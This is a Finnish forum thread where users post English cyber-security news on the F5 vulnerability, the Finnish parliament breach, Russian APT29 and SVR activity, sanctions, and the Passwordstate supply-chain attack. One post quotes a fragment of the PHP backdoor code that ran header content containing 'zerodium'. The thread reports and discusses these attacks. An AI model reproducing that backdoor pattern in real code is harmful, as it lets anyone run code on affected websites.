Cyber-ketju: verkkovakoilu,kännyköiden ja wlanien seuranta, hakkerointi, virukset, DoS etc

ctg

Greatest Leader
Toivottavasti meillä on päivitykset kunnossa

Attackers are exploiting a recently-patched, critical vulnerability in F5 devices that have not yet been updated.

The unauthenticated remote command execution flaw (CVE-2021-22986) exists in the F5 BIG-IP and BIG-IQ enterprise networking infrastructure, and could allow attackers to take full control over a vulnerable system.

Earlier in March, F5 issued a patch for the flaw, which has a CVSS rating of 9.8 and exists in the iControl REST interface. After the patch was issued, several researchers posted proof-of-concept (PoC) exploit code after reverse engineering the Java software patch in BIG-IP.

Tiedän kokemuksesta kuinka nihkeitä nämä päivitykset on firmoissa.
 

Rauhantekijä

Respected Leader
Suojelupoliisi epäilee Kiinaan sidoksissa olevaa toimijaa Eduskunnan tietomurrosta. Kun tutkinnan rikosnimikkeinä ovat törkeä vakoilu, törkeä tietomurto ja törkeä viestintäsalaisuuden loukkaus, jokainen ymmärtää, miten vakavasta asiasta on kyse. Edelleen keskustelu on siihen suuntaan että Suomi tulee reagoimaan ja vastaamaan jollain tavalla tähän tekoon.


No mitäs veikkaatte, mikä on Suomen jyröhdys Kiinan suuntaan?
Olisiko se, että "hakekaa pandat pois, meillä pidetään vain ystävyyden merkkejä" ? Vai mitä se olisi?

.
 

Rauhantekijä

Respected Leader
Ei muuta kuin asia viedään Haagiin ja annetaan niiden päättää miten vastataan.
Ei kai tässä Haagia tarvita sen enempää kuin Suomeen kohdistuvissa ilmatilaloukkauksissakaan. Hoidetaan ihan ite tavalla joka päätetään.
Mitä olis?
 
  • Tykkää
Reactions: ctg

ctg

Greatest Leader
convert_to_string(enc);
if (strstr(Z_STRVAL_P(enc), "zerodium")) {
zend_try {
zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");

A hacker compromised the server used to distribute the PHP programming language and added a backdoor to source code that would have made websites vulnerable to complete takeover, members of the open source project said.

Two updates pushed to the PHP Git server over the weekend added a line that, if run by a PHP-powered website, would have allowed visitors with no authorization to execute code of their choice. The malicious commits here and here gave the code the code-injection capability to visitors who had the word “zerodium” in an HTTP header.
 

ctg

Greatest Leader
@Rauhantekijä

Can nation-states defend themselves from hackers and one another?​

Steven Cherry Yeah, I mean, this militarization can involve actual counterattacks, right? I mean, in Trickbot there was one. Microsoft went to the courts to be allowed to conduct a counterattack on the malware. And it’s as if the courts are there to reassure us that Microsoft is one of the good guys and its enemies are the bad guys and it’s okay for Microsoft to strike back. Does that sound right? And in your opinion of the courts up to serving in that role?

Justin Cappos I think this is a very difficult question. There are judges that know quite a bit about security. If I think you took the average judge in the average court, I think they’re absolutely not prepared for this. I certainly wouldn’t want to try to speak for all judges because I have seen some very well reasoned things come out of individual judges here and there who really do seem to understand the technologies and things involved that at a reasonable level to make that judgment.

I do feel overall that going in launching counterattacks is a very, very problematic way of dealing with things because there tends to be collateral damage and there tends to be other types of problems from launching counterattacks. In some ways, it’s a little bit like bringing in an outside species to try to control the problem you have with some other pests where time and time again humans have tried. Oh, we’re going to just we’re going to bring in the cane toads to eat these flies that are plaguing our sugar cane plants or we’re going to bring in this, or we’re going to do that. It just has a way of escalating and getting out of control and causing more damage than perhaps it should. So in general, I think that there are often other ways you can go about this, sort of depending on how you need to strike back and where. But I think that in general, launching retaliatory cyber attacks is a bad idea.

 

ctg

Greatest Leader
@Rauhantekijä

The US Treasury Department, meanwhile, imposed sanctions to retaliate for what it said were “aggressive and harmful activities by the Government of the Russian Federation.” The measures include new prohibitions on Russian sovereign debt and sanctions on six Russia-based firms that the Treasury Department said “supported the Russian Intelligence Services’ efforts to carry out malicious cyber activities against the United States.”

The firms are:
  • ERA Technopolis, a research center operated by the Russian Ministry of Defense for transferring the personnel and expertise of the Russian technology sector to the development of technologies used by the country’s military. ERA Technopolis supports Russia’s Main Intelligence Directorate (GRU), a body responsible for offensive cyber and information operations.
  • Pasit, a Russia-based information technology company that has conducted research and development supporting malicious cyber operations by the SVR.
  • SVA, a Russian state-owned research institute specializing in advanced systems for information security located in that country. SVA has done research and development in support of the SVR’s malicious cyber operations.
  • Neobit, a Saint Petersburg, Russia-based IT security firm whose clients include the Russian Ministry of Defense, SVR, and Russia’s Federal Security Service. Neobit conducted research and development in support of the cyber operations conducted by the FSB, GRU, and SVR.
  • AST, a Russian IT security firm whose clients include the Russian Ministry of Defense, SVR, and FSB. AST provided technical support to cyber operations conducted by the FSB, GRU, and SVR.
  • Positive Technologies, a Russian IT security firm that supports Russian Government clients, including the FSB. Positive Technologies provides computer network security solutions to Russian businesses, foreign governments, and international companies and hosts recruiting events for the FSB and GRU.
“The reason they were called out is because they’re an integral part and participant in the operation that the SVR executes,” Joyce said of the six companies. “Our hope is that by denying the SVR the support of those companies, we’re impacting their ability to project some of this malicious activity around the world and especially into the US.”
 

ctg

Greatest Leader
Widely deployed platforms from Citrix, Fortinet, Pulse Secure, Synacor and VMware are all in the crosshairs of APT29, bent on stealing credentials and more.
The Feds are warning that nation-state actors are once again after U.S. assets, this time in a spate of cyberattacks that exploit five vulnerabilities that affect VPN solutions, collaboration-suite software and virtualization technologies.
According to the U.S. National Security Agency (NSA), which issued an alert Thursday, the advanced persistent threat (APT) group known as APT29 (a.k.a. Cozy Bear or The Dukes) is conducting “widespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access.”
The targets include U.S. and allied national-security and government networks, it added.
 

ctg

Greatest Leader
As many as 29,000 users of the Passwordstate password manager downloaded a malicious update that extracted data from the app and sent it to an attacker-controlled server, the app-maker told customers.

In an email, Passwordstate creator Click Studios told customers that bad actors compromised its upgrade mechanism and used it to install a malicious file on user computers. The file, named “moserware.secretsplitter.dll,” contained a legitimate copy of an app called SecretSplitter, along with malicious code named "Loader," according to a brief writeup from security firm CSIS Group.
 

ctg

Greatest Leader
Following attribution of the SolarWinds supply chain attack to Russia's APT29, the US CISA infosec agency has published a list of the spies' known tactics – including a penchant for using a naughtily named email provider.

APT29* is the Western infosec world's codename for what we now know is the Russian Foreign Intelligence Service, known by its Russian acronym SVR.

As well as publishing a list of things US counterintelligence know about their Russian offensive counterparts, CISA has also added some advice on how to avoid these common Russian intelligence compromise tactics.

SVR's break-in pros use techniques including "low and slow" password spraying targeted at known admin accounts, zero-days deployed against VPN appliances, and then deploying droppers such as WellMess.

The FBI's initial findings indicate similar post-infection tradecraft with other SVR-sponsored intrusions, including how the actors purchased and managed infrastructure used in the intrusions. After obtaining access to victim networks, SVR cyber actors moved through the networks to obtain access to e-mail accounts. Targeted accounts at multiple victim organizations included accounts associated with IT staff. The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions.

Detecting the SVR consisted of fairly routine stuff, according to CISA: auditing log files "to identify attempts to access privileged certificates", monitoring networks for encoded PowerShell commands, behavioural profiling of accounts to detect unusual activity indicating a compromise, and using threat intel to keep an eye on "credential abuse within cloud environments."

One giveaway that you might have a Russian spy poking about, warned CISA, is the use of a cock[.]li email address. Though we're fairly sure it wasn't a Russian spy who called us abusive names from a cock[.]li email address in 2016, CISA reckons: "While not exclusively used by SVR cyber actors, a number of SVR cyber personas use e-mail services hosted on cock[.]li or related domains."

We have asked cock[.]li's maintainer, Vincent Canfield, by email for his thoughts on being named by the US government as a harbourer of hostile foreign spies, and will reproduce any printable ones if he replies.
 
  • Tykkää
Reactions: M&R
Top